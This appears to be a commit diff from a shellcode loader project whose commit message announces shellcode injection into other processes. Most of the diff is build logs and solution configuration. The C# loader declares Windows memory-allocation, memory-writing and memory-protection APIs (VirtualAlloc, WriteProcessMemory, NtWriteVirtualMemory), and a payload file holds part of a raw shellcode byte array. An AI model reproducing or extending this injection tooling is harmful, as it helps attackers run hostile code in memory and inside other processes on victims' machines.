Other procs

Added shellcode injection for other processes

PayloadCSharp/obj/Debug/PayloadCSharp.csproj.CoreCompileInputs.cache

@@ -0,0 +1 @@
+f28cb18b6464b65741bdd61cdf8994c9416493a7

PayloadCSharp/obj/Debug/PayloadCSharp.csproj.FileListAbsolute.txt

@@ -0,0 +1,6 @@
+F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.exe.config
+F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.exe
+F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.pdb
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.csproj.CoreCompileInputs.cache
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.exe
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.pdb

PayloadCpp/Release/PayloadCpp.log

@@ -1,7 +1,7 @@
   pch.cpp
   dllmain.cpp
   Génération de code en cours
-  Previous IPDB not found, fall back to full compilation.
+  Previous IPDB was built with incompatible compiler, fall back to full compilation.
   All 1 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
   Fin de la génération du code
   PayloadCpp.vcxproj -> F:\Personal\ShellCodeLoader\Release\PayloadCpp.dll

PayloadCpp/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate

@@ -1,2 +1,2 @@
-PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionMFC=14.29.30038:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:VCServicingVersionMFC=14.29.30136:VCServicingVersionATL=14.29.30136:VCServicingVersionCrtHeaders=14.29.30136:VCServicingVersionCompilers=14.29.30136:TargetPlatformVersion=10.0.19041.0:
 Release|Win32|F:\Personal\ShellCodeLoader\|

PayloadCpp/x64/Debug/PayloadCpp.dll.recipe

@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project>
+  <ProjectOutputs>
+    <ProjectOutput>
+      <FullPath>F:\Personal\ShellCodeLoader\x64\Debug\PayloadCpp.dll</FullPath>
+    </ProjectOutput>
+  </ProjectOutputs>
+  <ContentFiles />
+  <SatelliteDlls />
+  <NonRecipeFileRefs />
+</Project>

PayloadCpp/x64/Debug/PayloadCpp.log

@@ -0,0 +1,3 @@
+  pch.cpp
+  dllmain.cpp
+  PayloadCpp.vcxproj -> F:\Personal\ShellCodeLoader\x64\Debug\PayloadCpp.dll

PayloadCpp/x64/Debug/PayloadCpp.tlog/PayloadCpp.lastbuildstate

@@ -0,0 +1,2 @@
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionMFC=14.29.30038:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
+Debug|x64|F:\Personal\ShellCodeLoader\|

PayloadCpp/x64/Release/PayloadCpp.log

@@ -1,7 +1,6 @@
-  pch.cpp
-  dllmain.cpp
-  Génération de code en cours
-  Previous IPDB not found, fall back to full compilation.
-  All 1 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+  Génération de code en cours
+  0 of 1 functions ( 0.0%) were compiled, the rest were copied from previous compilation.
+    0 functions were new in current compilation
+    0 functions had inline decision re-evaluated but remain unchanged
   Fin de la génération du code
   PayloadCpp.vcxproj -> F:\Personal\ShellCodeLoader\x64\Release\PayloadCpp.dll

PayloadCpp/x64/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate

@@ -1,2 +1,2 @@
-PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionMFC=14.29.30038:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:VCServicingVersionMFC=14.29.30136:VCServicingVersionATL=14.29.30136:VCServicingVersionCrtHeaders=14.29.30136:VCServicingVersionCompilers=14.29.30136:TargetPlatformVersion=10.0.19041.0:
 Release|x64|F:\Personal\ShellCodeLoader\|

Payloads/PayloadCpp64.cs

@@ -4,7 +4,8 @@
 */
 namespace Test
 {
-	public class PayloadCpp64{
+	public class PayloadCpp64
+	{
 		public static byte[] rawData = {
 			0xE8, 0x80, 0x3D, 0x00, 0x00, 0x80, 0x3D, 0x00, 0x00, 0x0F, 0x21, 0x6B,
 			0xEB, 0xA9, 0xDF, 0xEA, 0x5F, 0x88, 0xCC, 0x42, 0xF0, 0xA3, 0x19, 0x64,

ShellCodeLoader.sln

@@ -23,8 +23,8 @@ Global
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
 		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
 		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|Any CPU.Build.0 = Debug|Any CPU
-		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.ActiveCfg = Debug|Any CPU
-		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.Build.0 = Debug|Any CPU
+		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.ActiveCfg = Release|Any CPU
+		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.Build.0 = Release|Any CPU
 		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x86.ActiveCfg = Debug|Any CPU
 		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x86.Build.0 = Debug|Any CPU
 		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|Any CPU.ActiveCfg = Release|Any CPU
@@ -35,19 +35,19 @@ Global
 		{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|x86.Build.0 = Release|Any CPU
 		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
 		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.Build.0 = Debug|Any CPU
-		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|x64
-		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|x64
+		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|Any CPU
+		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|Any CPU
 		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.ActiveCfg = Debug|Any CPU
 		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.Build.0 = Debug|Any CPU
-		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.ActiveCfg = Debug|Any CPU
-		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.Build.0 = Debug|Any CPU
+		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.ActiveCfg = Release|x64
+		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.Build.0 = Release|x64
 		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x64.ActiveCfg = Release|Any CPU
 		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x64.Build.0 = Release|Any CPU
 		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x86.ActiveCfg = Release|Any CPU
 		{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x86.Build.0 = Release|Any CPU
 		{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|Any CPU.ActiveCfg = Debug|Win32
-		{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.ActiveCfg = Debug|x64
-		{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.Build.0 = Debug|x64
+		{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.ActiveCfg = Debug|Win32
+		{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.Build.0 = Debug|Win32
 		{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x86.ActiveCfg = Debug|Win32
 		{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x86.Build.0 = Debug|Win32
 		{05027976-CAC5-447F-84B6-77F38AF2566C}.Release|Any CPU.ActiveCfg = Release|x64

ShellCodeLoader/ShellCodeLoader.cs

@@ -1,5 +1,6 @@
 using System;
 using System.Runtime.InteropServices;
+using System.Threading;
 using System.Threading.Tasks;
 using Microsoft.Win32.SafeHandles;
 /*
@@ -9,6 +10,7 @@
  */
 namespace ShellCodeLoader
 {
+
     public class ShellCodeLoader : IDisposable
     {
         private byte[] ShellCode;
@@ -34,10 +36,12 @@ public void LoadWithNT()
         {
             if (this.Asynchronous)
             {
-                Task.Run(() =>
+                Task.Factory.StartNew(() => { NT(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
+                //Replace Task.Run with Task.Factory.StartNew for .net 4
+                /*Task.Run(() =>
                 {
                     NT();
-                });
+                });*/
             }
             else 
             {
@@ -49,10 +53,7 @@ public void LoadWithKernel32()
         {
             if (this.Asynchronous)
             {
-                Task.Run(() =>
-                {
-                    Kernel32();
-                });
+                Task.Factory.StartNew(() => { Kernel32(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
             }
             else 
             {
@@ -64,10 +65,8 @@ public void LoadWithNTDelegates()
         {
             if (this.Asynchronous)
             {
-                Task.Run(() =>
-                {
-                    NTDelegates();
-                });
+                Task.Factory.StartNew(() => { NTDelegates(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
+
             }
             else 
             {
@@ -79,7 +78,7 @@ public void LoadWithKernel32Delegates()
         {
             if (this.Asynchronous)
             {
-                Kernel32Delegates();
+                Task.Factory.StartNew(() => { Kernel32Delegates(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
             }
             else
             {
@@ -167,26 +166,36 @@ private static class Imports
 
             [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
             public static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
+
             [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
             public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
+
             [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
             public static extern uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
+
             [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
             public static extern uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
 
-            [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
-            public static extern IntPtr GetCurrentProcess();
+
+
             [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
             public static extern IntPtr VirtualAlloc(IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
+
             [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
             public static extern IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
+
             [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
             public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
+
             [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
             public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
 
+            [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+            public static extern IntPtr GetCurrentProcess();
+
             [DllImport(KERNEL32)]
             public static extern IntPtr GetModuleHandle(string lpModuleName);
+
             [DllImport(KERNEL32)]
             public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
 

ShellCodeLoader/ShellCodeLoader.csproj

@@ -9,9 +9,10 @@
     <AppDesignerFolder>Properties</AppDesignerFolder>
     <RootNamespace>ShellCodeLoader</RootNamespace>
     <AssemblyName>ShellCodeLoader</AssemblyName>
-    <TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
+    <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
     <FileAlignment>512</FileAlignment>
     <Deterministic>true</Deterministic>
+    <TargetFrameworkProfile />
   </PropertyGroup>
   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
     <DebugSymbols>true</DebugSymbols>
@@ -29,6 +30,25 @@
     <DefineConstants>TRACE</DefineConstants>
     <ErrorReport>prompt</ErrorReport>
     <WarningLevel>4</WarningLevel>
+    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
+    <DebugSymbols>true</DebugSymbols>
+    <OutputPath>bin\x64\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <DebugType>full</DebugType>
+    <PlatformTarget>x64</PlatformTarget>
+    <LangVersion>7.3</LangVersion>
+    <ErrorReport>prompt</ErrorReport>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
+    <OutputPath>bin\x64\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <Optimize>true</Optimize>
+    <DebugType>pdbonly</DebugType>
+    <PlatformTarget>x64</PlatformTarget>
+    <LangVersion>7.3</LangVersion>
+    <ErrorReport>prompt</ErrorReport>
   </PropertyGroup>
   <ItemGroup>
     <Reference Include="System" />
@@ -37,6 +57,7 @@
   <ItemGroup>
     <Compile Include="ShellCodeLoader.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="ShellCodeLoaderEx.cs" />
   </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
 </Project>